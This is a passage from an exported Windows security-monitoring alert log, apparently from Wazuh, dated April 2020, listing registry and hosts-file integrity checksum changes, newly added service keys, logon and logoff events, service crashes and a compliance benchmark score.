'5499f2465b93c7b9d2932c510d331d41' +Old sha1sum was: '8bb61b82ef06aca0226aabaabd5850edec858d9a' +New sha1sum is : 'e252541cf73578cba0af49aaa7f38f21399e2f73' +" +"Apr 6, 2020 @ 14:27:11.257",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. +Old md5sum was: '5de0ef21cee3c7b87f2fab30b8b06e2e' +New md5sum is : '671078222c6f28f8a987ef233af7d5a5' +Old sha1sum was: '95450da791d27d0a0e456663988211c24b30dbec' +New sha1sum is : 'c62d69328b5a046dd8494e6a38df8074f8310102' +" +"Apr 6, 2020 @ 14:27:11.241",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. +Old md5sum was: '728627011eedd28411cf4e1f2a30d1ca' +New md5sum is : '7f4e2820a9e8df5c63678e03b97248cc' +Old sha1sum was: '26576187b3bbee39309e7ebe95de85749ea7b9d2' +New sha1sum is : '0b434b24c6b38ea405074bb98c33b674da54a900' +" +"Apr 6, 2020 @ 14:27:06.428",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Diagnostics' checksum changed. +Old md5sum was: 'b94f00fb649e58278413ddb218687776' +New md5sum is : 'fa742e572a0ab3ad838cdc36f548a2e7' +Old sha1sum was: '4e632334dcf3fb5f87a71c66694dd9a1eb5fdbc7' +New sha1sum is : '4bd92b98f3142283ddbfa0b8875cc0e446f8a651' +" +"Apr 6, 2020 @ 14:27:04.894",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2c34c' was added. +" +"Apr 6, 2020 @ 14:27:04.881",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_163a67' was added. +" +"Apr 6, 2020 @ 14:27:04.881",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2c34c\Security' was added. +" +"Apr 6, 2020 @ 14:27:04.808",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_163a67\Security' was added. +" +"Apr 6, 2020 @ 14:27:03.952",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2c34c' was added. +" +"Apr 6, 2020 @ 14:27:03.931",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2c34c\Security' was added. +" +"Apr 6, 2020 @ 14:27:03.912",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_163a67' was added. +" +"Apr 6, 2020 @ 14:27:03.898",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_163a67\Security' was added. +" +"Apr 6, 2020 @ 14:27:02.350",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2c34c' was added. +" +"Apr 6, 2020 @ 14:27:02.334",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2c34c\Security' was added. +" +"Apr 6, 2020 @ 14:27:02.319",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_163a67' was added. +" +"Apr 6, 2020 @ 14:27:02.303",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_163a67\Security' was added. +" +"Apr 6, 2020 @ 14:26:59.803",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : 'f906c668d9a9517e97299e9a3d5136fe' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : '9861531a255dbfbd2c4e14a0673818cc18a6ee0d' +" +"Apr 6, 2020 @ 14:26:59.225",5,"Windows System error event", +"Apr 6, 2020 @ 14:26:59.222",5,"Windows System error event", +"Apr 6, 2020 @ 14:26:58.506",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\mssmbios\Data' checksum changed. +Old md5sum was: '56e9f0a7add3da7f007b812f71fed075' +New md5sum is : '1e6e38e0129cb1178036ce2d2de63896' +Old sha1sum was: 'e34bbe63c9ca7e70f4e38fca2b5911ca2863966f' +New sha1sum is : 'c69f3fa6abcfb59085cdd1e6fe3925b88bf1eb8a' +" +"Apr 6, 2020 @ 14:26:58.242",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\msisadrv\Parameters\Wdf' checksum changed. +Old md5sum was: 'b86fbb8c7365f0cd160fe1dd1a4e4de8' +New md5sum is : 'e8e23284dccb7ccee8c1c0f3d044aca0' +Old sha1sum was: 'f01eba6dbe74107285007351b77304e1a19bc18e' +New sha1sum is : 'b6870b3d74893979c44b3336a301dce27cd672f1' +" +"Apr 6, 2020 @ 14:26:57.600",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\monitor\Parameters\Wdf' checksum changed. +Old md5sum was: 'a22f4624fc957eb22f371c4f482524df' +New md5sum is : '03aad37d2328a1b41c130ad79ee23de7' +Old sha1sum was: '432b869a738326466b200cc25be6d8307cfdc040' +New sha1sum is : '8f018594a2fffb11ad549b80854873098cfd2b7a' +" +"Apr 6, 2020 @ 14:26:57.490",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2c34c' was added. +" +"Apr 6, 2020 @ 14:26:57.476",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2c34c\TriggerInfo\0' was added. +" +"Apr 6, 2020 @ 14:26:57.459",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_2c34c\Security' was added. +" +"Apr 6, 2020 @ 14:26:57.446",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_163a67' was added. +" +"Apr 6, 2020 @ 14:26:57.429",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_163a67\TriggerInfo\0' was added. +" +"Apr 6, 2020 @ 14:26:57.412",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\MessagingService_163a67\Security' was added. +" +"Apr 6, 2020 @ 14:26:57.335",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:26:57.320",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:26:57.289",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:26:57.258",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:26:57.241",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:26:57.194",5,"Windows Push Notifications User Service_163a67 terminated unexpectedly", +"Apr 6, 2020 @ 14:26:57.178",5,"Sync Host_163a67 terminated unexpectedly", +"Apr 6, 2020 @ 14:26:57.163",5,"Connected Devices Platform User Service_163a67 terminated unexpectedly", +"Apr 6, 2020 @ 14:26:57.147",5,"Clipboard User Service_163a67 terminated unexpectedly", +"Apr 6, 2020 @ 14:26:50.132",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanmanServer\Parameters' checksum changed. +Old md5sum was: 'bad2d92e8c5f76681c68068d36d9f8de' +New md5sum is : '578f6159462dbf35644b32173a6272dc' +Old sha1sum was: 'a72e7b39c1d81678ec13d5d1bb05ce48683f8df2' +New sha1sum is : '22d6c3d14484030a1223ac49b63a08d1adfb9f12' +" +"Apr 6, 2020 @ 14:26:48.913",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\intelppm\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : 'f906c668d9a9517e97299e9a3d5136fe' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : '9861531a255dbfbd2c4e14a0673818cc18a6ee0d' +" +"Apr 6, 2020 @ 14:26:46.679",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:26:46.218",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\HDAudBus\Parameters\Wdf' checksum changed. +Old md5sum was: '3879a39655c450780e274d024098bdb5' +New md5sum is : '8c770c3cc590a59f4fec7b255faee1f2' +Old sha1sum was: '8d6f073ffa5ccb93f82238394c9d0c663088a3db' +New sha1sum is : '327f74762b95e433a1a48c7b90680a4e0a0bce77' +" +"Apr 6, 2020 @ 14:26:45.682",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\gencounter\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : 'f906c668d9a9517e97299e9a3d5136fe' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : '9861531a255dbfbd2c4e14a0673818cc18a6ee0d' +" +"Apr 6, 2020 @ 14:26:45.492",4,"Summary event of the report's signatures", +"Apr 6, 2020 @ 14:26:44.668",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\FDResPub\ServiceData' checksum changed. +Old md5sum was: '8babdce3ab05d3473a80df927d06237f' +New md5sum is : 'ae9643074ec7a4ef81bb63a482e527c9' +Old sha1sum was: 'e353e522c03a6a1e27f132fba0a42bb0a83e4bf3' +New sha1sum is : 'bb90e1460f2a74046f7b573529a69b9faa6b3a52' +" +"Apr 6, 2020 @ 14:26:44.001",9,"Windows Application error event", +"Apr 6, 2020 @ 14:26:42.741",3,"Software Protection service scheduled successfully", +"Apr 6, 2020 @ 14:26:41.444",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:26:36.991",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\EventLog\State' checksum changed. +Old md5sum was: 'a397028e02aba031e9a6ca6ee2322c66' +New md5sum is : '84f9da38aef52b57b0f950a9bf807f50' +Old sha1sum was: 'e1b5f87525d9b51c14a1dc0fb6f9183e950d4dd8' +New sha1sum is : 'da7ce1f2de2fac02702a496feefad65ff9721121' +" +"Apr 6, 2020 @ 14:26:28.975",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Dnscache\Parameters\Probe\{a957488a-bcc3-4136-8332-2c86058caa77}' checksum changed. +Old md5sum was: '903b8f5bbc25f56d3fac80d5240a6156' +New md5sum is : '62adcc7d0cabf983a9a5489de147c514' +Old sha1sum was: '0acdfeec8685fdcaec51aa86a23df09cd0f828e6' +New sha1sum is : '223860dda4c8b799b031b85964a111ab435e0f6f' +" +"Apr 6, 2020 @ 14:26:27.585",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2c34c' was added. +" +"Apr 6, 2020 @ 14:26:27.569",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_2c34c\Security' was added. +" +"Apr 6, 2020 @ 14:26:27.562",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_163a67' was added. +" +"Apr 6, 2020 @ 14:26:27.522",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicesFlowUserSvc_163a67\Security' was added. +" +"Apr 6, 2020 @ 14:26:27.459",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2c34c' was added. +" +"Apr 6, 2020 @ 14:26:27.429",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_2c34c\Security' was added. +" +"Apr 6, 2020 @ 14:26:27.131",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_163a67' was added. +" +"Apr 6, 2020 @ 14:26:27.116",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DevicePickerUserSvc_163a67\Security' was added. +" +"Apr 6, 2020 @ 14:26:26.823",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2c34c' was added. +" +"Apr 6, 2020 @ 14:26:26.803",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_2c34c\Security' was added. +" +"Apr 6, 2020 @ 14:26:26.788",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_163a67' was added. +" +"Apr 6, 2020 @ 14:26:26.757",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\DeviceAssociationBrokerSvc_163a67\Security' was added. +" +"Apr 6, 2020 @ 14:26:26.521",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2c34c' was added. +" +"Apr 6, 2020 @ 14:26:26.491",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_2c34c\Security' was added. +" +"Apr 6, 2020 @ 14:26:26.475",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_163a67' was added. +" +"Apr 6, 2020 @ 14:26:26.462",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CredentialEnrollmentManagerUserSvc_163a67\Security' was added. +" +"Apr 6, 2020 @ 14:26:26.271",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2c34c' was added. +" +"Apr 6, 2020 @ 14:26:26.241",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_2c34c\Security' was added. +" +"Apr 6, 2020 @ 14:26:25.944",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_163a67' was added. +" +"Apr 6, 2020 @ 14:26:25.922",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_163a67\Security' was added. +" +"Apr 6, 2020 @ 14:26:25.772",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CompositeBus\Parameters\Wdf' checksum changed. +Old md5sum was: '67c10bdce559c177fe0d89a2be194410' +New md5sum is : 'fcdb07c6a1ed824ae9455a64b2c0bb9e' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : '584b2e2ecab9f7b853efa748028018d4698a2e87' +" +"Apr 6, 2020 @ 14:26:24.271",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2c34c' was added. +" +"Apr 6, 2020 @ 14:26:24.238",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_2c34c\Security' was added. +" +"Apr 6, 2020 @ 14:26:24.212",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_163a67' was added. +" +"Apr 6, 2020 @ 14:26:24.195",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_163a67\Security' was added. +" +"Apr 6, 2020 @ 14:26:24.043",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2c34c' was added. +" +"Apr 6, 2020 @ 14:26:24.009",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_2c34c\Security' was added. +" +"Apr 6, 2020 @ 14:26:23.981",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_163a67' was added. +" +"Apr 6, 2020 @ 14:26:23.971",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_163a67\Security' was added. +" +"Apr 6, 2020 @ 14:26:23.840",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2c34c' was added. +" +"Apr 6, 2020 @ 14:26:23.825",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_2c34c\Security' was added. +" +"Apr 6, 2020 @ 14:26:23.813",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_163a67' was added. +" +"Apr 6, 2020 @ 14:26:23.787",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_163a67\Security' was added. +" +"Apr 6, 2020 @ 14:26:21.633",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2c34c' was added. +" +"Apr 6, 2020 @ 14:26:21.615",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2c34c\TriggerInfo\4' was added. +" +"Apr 6, 2020 @ 14:26:21.585",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2c34c\TriggerInfo\3' was added. +" +"Apr 6, 2020 @ 14:26:21.568",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2c34c\TriggerInfo\2' was added. +" +"Apr 6, 2020 @ 14:26:21.553",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2c34c\TriggerInfo\1' was added. +" +"Apr 6, 2020 @ 14:26:21.537",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2c34c\TriggerInfo\0' was added. +" +"Apr 6, 2020 @ 14:26:21.522",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_2c34c\Security' was added. +" +"Apr 6, 2020 @ 14:26:21.506",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_163a67' was added. +" +"Apr 6, 2020 @ 14:26:21.492",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_163a67\TriggerInfo\4' was added. +" +"Apr 6, 2020 @ 14:26:21.479",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_163a67\TriggerInfo\3' was added. +" +"Apr 6, 2020 @ 14:26:21.463",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_163a67\TriggerInfo\2' was added. +" +"Apr 6, 2020 @ 14:26:21.446",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_163a67\TriggerInfo\1' was added. +" +"Apr 6, 2020 @ 14:26:21.428",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_163a67\TriggerInfo\0' was added. +" +"Apr 6, 2020 @ 14:26:21.402",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_163a67\Security' was added. +" +"Apr 6, 2020 @ 14:26:20.340",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2c34c' was added. +" +"Apr 6, 2020 @ 14:26:20.291",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_2c34c\Security' was added. +" +"Apr 6, 2020 @ 14:26:20.257",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_163a67' was added. +" +"Apr 6, 2020 @ 14:26:20.247",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_163a67\Security' was added. +" +"Apr 6, 2020 @ 14:26:19.959",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-2' checksum changed. +Old md5sum was: '60dd34472b7c4b4733f08655c4f60df2' +New md5sum is : '2c61255f33c4fb43a225480258ec4380' +Old sha1sum was: '525a1f729b820c37784c2e975a559deaf184ebb7' +New sha1sum is : '3d522bd22a6f5275d938735abc8eefcd62d2e82c' +" +"Apr 6, 2020 @ 14:26:19.943",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-1' checksum changed. +Old md5sum was: '9f6b145dfd560fe21c8d05748910373f' +New md5sum is : 'd13ad6eb1737d32be81bf0fbad2ea850' +Old sha1sum was: '1838fd4dbd6d85706ba7cced91d89cbd875eff11' +New sha1sum is : 'd99b8a072444d528506f4a8568712fe5ddf19d83' +" +"Apr 6, 2020 @ 14:26:19.934",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: '6a5ba5db7a5af421f75d94743743fe75' +New md5sum is : 'a94717f9cc73ebc01ca04b0844af85df' +Old sha1sum was: '31ff396526e9de372a9c73b66b754121a6110de5' +New sha1sum is : 'f239544f614ade15297b6b97ca2eb82e97b517de' +" +"Apr 6, 2020 @ 14:26:19.899",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: 'dca242a1798caa2a9ae6de537858dfe3' +New md5sum is : '6b831538504aed43ca0079095c23729d' +Old sha1sum was: 'c25d276ea70b377a2d82cd0b2ea1b00a07a517ca' +New sha1sum is : '1d76c9113ab9a7701e6f8efb24ed1dfcfe36b391' +" +"Apr 6, 2020 @ 14:26:17.678",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2c34c' was added. +" +"Apr 6, 2020 @ 14:26:17.652",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_2c34c\Security' was added. +" +"Apr 6, 2020 @ 14:26:17.616",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_163a67' was added. +" +"Apr 6, 2020 @ 14:26:17.600",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_163a67\Security' was added. +" +"Apr 6, 2020 @ 14:26:12.446",5,"License Activation (slui.exe) failed", +"Apr 6, 2020 @ 14:26:04.128",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 14:26:04.091",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 14:26:02.521",5,"SessionEnv was unavailable to handle a notification event", +"Apr 6, 2020 @ 14:26:02.271",7,"SessionEnv was unavailable to handle a critical notification event", +"Apr 6, 2020 @ 14:25:50.630",5,"Windows System error event", +"Apr 6, 2020 @ 14:25:50.615",5,"Windows System error event", +"Apr 6, 2020 @ 14:25:47.975",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:25:47.803",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:25:47.762",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:25:47.708",5,"Windows Push Notifications User Service_2c34c terminated unexpectedly", +"Apr 6, 2020 @ 14:25:47.677",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:25:47.662",5,"Connected Devices Platform User Service_2c34c terminated unexpectedly", +"Apr 6, 2020 @ 14:25:47.428",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:25:47.412",5,"Clipboard User Service_2c34c terminated unexpectedly", +"Apr 6, 2020 @ 14:25:42.506",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '497a8c7081c737f07c267a30b1538ff9' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : '58d9cdbd07af978efc5e91b8e7a66696280d3b1e' +" +"Apr 6, 2020 @ 14:25:41.615",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}' checksum changed. +Old md5sum was: '2a569169f4c48da58d55d87631b3625e' +New md5sum is : 'eabef0d1f7faf9368acee28f84f9b211' +Old sha1sum was: '2ff153ca41593d1937308f478acf09efa60a0930' +New sha1sum is : 'be8f5aa697bbfd3ee56c683cc08676dc72effdcd' +" +"Apr 6, 2020 @ 14:25:41.287",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\Main' checksum changed. +Old md5sum was: 'e926791c45461d05188fa45b7dfbea50' +New md5sum is : '1763e3f11e8f89848387ac81ad778aa5' +Old sha1sum was: 'f01955b750dd7024d0ec41bb6eb55cdeb3f2114a' +New sha1sum is : '12d11f0fa820cffcd9480bcdf6f248b633070537' +" +"Apr 6, 2020 @ 14:25:37.709",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:25:36.709",4,"Summary event of the report's signatures", +"Apr 6, 2020 @ 14:25:35.428",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:25:35.381",9,"Windows Application error event", +"Apr 6, 2020 @ 14:25:31.599",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer\ActiveX Compatibility' checksum changed. +Old md5sum was: 'd41d8cd98f00b204e9800998ecf8427e' +New md5sum is : '44a185f2e5e0fa09edbcbe3e598fe4da' +Old sha1sum was: 'da39a3ee5e6b4b0d3255bfef95601890afd80709' +New sha1sum is : 'f7a3cf6aa04ebaeee3c4525064299cb2136e4f06' +" +"Apr 6, 2020 @ 14:25:28.647",3,"Software Protection service scheduled successfully", +"Apr 6, 2020 @ 14:25:09.678",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender' checksum changed. +Old md5sum was: '59cb747b331c527a030961483156cea0' +New md5sum is : 'bd77bf299c0366a5a3013dd7209f2afa' +Old sha1sum was: '797f0246bbcb2020cc30cde64c69b48810b0e47e' +New sha1sum is : '064e1756881953a404b3daf932947bef82ccadd4' +" +"Apr 6, 2020 @ 14:25:08.693",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows Defender' checksum changed. +Old md5sum was: '59cb747b331c527a030961483156cea0' +New md5sum is : 'bd77bf299c0366a5a3013dd7209f2afa' +Old sha1sum was: '797f0246bbcb2020cc30cde64c69b48810b0e47e' +New sha1sum is : '064e1756881953a404b3daf932947bef82ccadd4' +" +"Apr 6, 2020 @ 14:24:59.677",7,"Integrity checksum changed.","File 'c:\windows\system32\drivers\etc\hosts' checksum changed. +Size changed from '2103' to '824' +Old md5sum was: 'a4eca8014112a13122660b77e6f9eca2' +New md5sum is : '3688374325b992def12793500307566d' +Old sha1sum was: '07cce3458b422d02db7ad9cfbe227369ab2aa072' +New sha1sum is : '4bed0823746a2a8577ab08ac8711b79770e48274' +Old sha256sum was: 'd311a04d648b6a745f75a8d55d063343bbb8758dfcf0affe1dda9b7617dd4bc6' +New sha256sum is : '2d6bdfb341be3a6234b24742377f93aa7c7cfb0d9fd64efa9282c87852e57085' +Old modification time was: 'Sat Apr 4 15:55:41 2020', now it is 'Tue Mar 19 04:49:40 2019' +" +"Apr 6, 2020 @ 14:24:59.618",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:24:59.116",7,"Integrity checksum changed.","File 'c:\windows\sysnative\drivers\etc\hosts' checksum changed. +Size changed from '2103' to '824' +Old md5sum was: 'a4eca8014112a13122660b77e6f9eca2' +New md5sum is : '3688374325b992def12793500307566d' +Old sha1sum was: '07cce3458b422d02db7ad9cfbe227369ab2aa072' +New sha1sum is : '4bed0823746a2a8577ab08ac8711b79770e48274' +Old sha256sum was: 'd311a04d648b6a745f75a8d55d063343bbb8758dfcf0affe1dda9b7617dd4bc6' +New sha256sum is : '2d6bdfb341be3a6234b24742377f93aa7c7cfb0d9fd64efa9282c87852e57085' +Old modification time was: 'Sat Apr 4 15:55:41 2020', now it is 'Tue Mar 19 04:49:40 2019' +" +"Apr 6, 2020 @ 14:24:58.115",5,"License Activation (slui.exe) failed", +"Apr 6, 2020 @ 14:24:57.659",5,"License Activation (slui.exe) failed", +"Apr 6, 2020 @ 14:24:55.911",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:24:55.896",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:24:55.865",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 14:24:55.849",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 14:24:55.396",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (66)", +"Apr 6, 2020 @ 14:24:49.540",3,"The Windows Search Service started", +"Apr 6, 2020 @ 